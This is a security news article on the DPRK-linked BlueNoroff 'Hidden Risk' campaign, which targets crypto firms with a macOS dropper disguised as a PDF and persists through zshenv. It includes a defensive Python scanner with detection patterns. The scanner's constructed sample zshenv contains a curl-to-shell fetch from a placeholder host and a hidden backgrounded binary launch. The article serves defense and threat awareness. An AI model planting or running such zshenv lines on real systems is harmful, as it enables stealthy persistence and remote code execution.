North Korean Cybercriminals Target Cryptocurrency Companies with Covert Risky Malware on macOS
An anonymous entity linked to the Democratic People’s Republic of Korea (DPRK) has been found targeting companies in the cryptocurrency space using sophisticated malware capable of infiltrating Apple macOS devices.
Security firm SentinelOne, which tracks the operation as Hidden Risk, has attributed it with high confidence to BlueNoroff, a group previously associated with malware families such as RustBucket, KANDYKORN, ObjCShellz, RustDoor (also known as Thiefbucket), and TodoSwift.
The initiative “utilizes emails spreading fabricated news related to cryptocurrency trends for infecting targets via a malevolent application disguised as a PDF document,” noted researchers Raffaele Sabato, Phil Stokes, and Tom Hegel in a report provided to The Hacker News.
“The operation probably kicked off as early as July 2024 and employs email and PDF baits with sham news headlines or stories pertaining to crypto-related subjects.”
As per a disclosure by the U.S. Federal Bureau of Investigation (FBI) in a September 2024 bulletin, these schemes constitute “highly customized, challenging-to-detect social engineering” assaults targeted at employees in the decentralized finance (DeFi) and crypto domains.
The assaults present themselves as false job prospects or corporate investments, engaging with their victims over an extended period to establish trust before introducing malware.
SentinelOne observed an email phishing attempt aimed at a cryptocurrency-sector company in late October 2024 that distributed a dropper application masquerading as a PDF file (“Hidden Risk Behind New Surge of Bitcoin Price.app”) hosted on delphidigital[.]org.
The application, written in Swift, was signed and notarized on October 19, 2024, using the Apple developer ID “Avantis Regtech Private Limited (2S8XHJ7948).” Apple has since revoked the signature.
Upon launch, the application downloads a decoy PDF from Google Drive and displays it to the victim, while simultaneously fetching a second-stage executable from a remote server and running it. That second stage, an unsigned C++ Mach-O x86-64 executable, acts as a backdoor for executing remote commands.
The backdoor also uses a novel persistence mechanism that abuses the zshenv configuration file, the first time this technique has been observed in use by malware authors in the wild.
“This is particularly valuable on contemporary macOS versions since Apple has introduced user notifications for background Login Items starting macOS 13 Ventura,” the researchers commented.
“Apple’s notification feature aims to alert users when a persistence technique is deployed, especially frequently exploited LaunchAgents and LaunchDaemons. However, exploiting Zshenv does not trigger such a notification in current macOS iterations.”
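Because zshenv modifications raise no Login Item alert, defenders have to look for them directly. The script below is an added example, not code from SentinelOne's report: it scans the zshenv files zsh reads on every invocation (/etc/zshenv and $ZDOTDIR/.zshenv, or ~/.zshenv) and flags lines that do more than set environment variables. The embedded sample file and its hidden path are constructed for the demonstration, and every pattern is a triage heuristic, not proof of compromise.

```python
import os
import re
from pathlib import Path

# Heuristics: a benign zshenv normally only exports variables. Anything that
# downloads, decodes, evaluates or backgrounds a process deserves a look.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "downloads content at shell startup"),
    (r"\bbase64\b.*(-[dD]\b|--decode\b)", "decodes a base64 payload"),
    (r"\beval\b", "evaluates dynamically built commands"),
    (r"(/tmp/|/var/tmp/|/private/tmp/|/Users/Shared/)", "runs code from a world-writable directory"),
    (r"(\$HOME|~|/Users/\w+)/\.[\w-]+/", "references a hidden dotfile directory"),
    (r"\bnohup\b|(?<![&>])&(?!&)", "launches a background process"),
]

# Constructed sample: two benign exports followed by lines that mimic a
# zshenv persistence hook (paths and URL are placeholders, not real IoCs).
SAMPLE_ZSHENV = """\
# constructed sample zshenv
export PATH="$HOME/.cargo/bin:$PATH"
export EDITOR=vim
nohup "$HOME/.config/.update" >/dev/null 2>&1 &
curl -s https://example.invalid/stage2 | base64 -d | sh
"""


def scan_zshenv_text(text):
    """Return (line_no, reason, line) for each suspicious non-assignment line."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        # Plain `export VAR=value` lines without command separators are skipped.
        if not line or (re.fullmatch(r"(export\s+)?[A-Za-z_]\w*=[^;&|`]*", line)
                        and "$(" not in line):
            continue
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, line):
                findings.append((n, reason, raw.rstrip()))
    return findings


def scan_zshenv_files(home=None):
    """Scan the system-wide and per-user zshenv files; returns {path: findings}."""
    home = Path(home or Path.home())
    user_dir = Path(os.environ.get("ZDOTDIR") or home)  # zsh honours ZDOTDIR
    results = {}
    for path in (Path("/etc/zshenv"), user_dir / ".zshenv"):
        if path.is_file():
            results[str(path)] = scan_zshenv_text(path.read_text(errors="replace"))
    return results


if __name__ == "__main__":
    for hit in scan_zshenv_text(SAMPLE_ZSHENV):
        print("line %d: %s: %s" % hit)
```

On a live host, pair the findings with the file's modification time and the Login Items list so a fresh zshenv edit stands out against the notified persistence locations.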
The threat actor has been observed using the domain registrar Namecheap to set up infrastructure themed around crypto, Web3, and investments in order to appear legitimate. Quickpacket, Routerhosting, and Hostwinds are among its most frequently used hosting providers.
Notably, the campaign overlaps with an earlier operation flagged by Kandji in August 2024, which also used a similarly named macOS dropper application, “Risk factors for Bitcoin’s price decline are emerging(2024).app,” to deploy TodoSwift.
It is unclear what prompted the change in tactics, or whether it is a reaction to public reporting. Stokes told The Hacker News, “North Korean actors are recognized for their ingenuity, flexibility, and vigilance concerning reports on their actions, so it’s entirely conceivable that we’re simply witnessing diversification of effective methods from their offensive cyber initiatives.”
Another concerning aspect of the campaign is BlueNoroff’s ability to obtain or hijack legitimate Apple developer accounts and use them to have its malware notarized by Apple.
“Over the past year or so, North Korean cyber actors have carried out multiple offensives against crypto industries, many of which involved extensive target grooming via social platforms,” the researchers further added.
“The Hidden Risk operation deviates from this strategy by adopting a more conventional and direct, yet not necessarily less potent, email phishing approach. Despite the straightforwardness of the initial infection vector, other features reminiscent of past DPRK-supported operations are discernible.”
These developments follow other North Korean operations in which operatives seek employment at Western companies, or spread malware through booby-trapped code repositories and video-conferencing tools offered to job seekers under the guise of a recruitment challenge or project.
The two campaigns, named Wagemole (also UNC5267) and Contagious Interview, have been attributed to a threat group tracked as Famous Chollima (also CL-STA-0240 and Tenacious Pungsan).
ESET, branding Contagious Interview as DeceptiveDevelopment, has categorized it as a new Lazarus Group initiative focused on targeting freelance developers globally for cryptocurrency theft.
“The Contagious Interview and Wagemole campaigns exhibit the evolving strategies of North Korean threat actors as they persist in stealing data, obtaining remote positions in Western nations, and circumventing financial embargoes,” noted Zscaler ThreatLabz researcher Seongsu Park in a recent statement.
“With enhanced obfuscation methods, cross-platform compatibility, and extensive data theft, these campaigns represent an escalating threat to businesses and individuals alike.”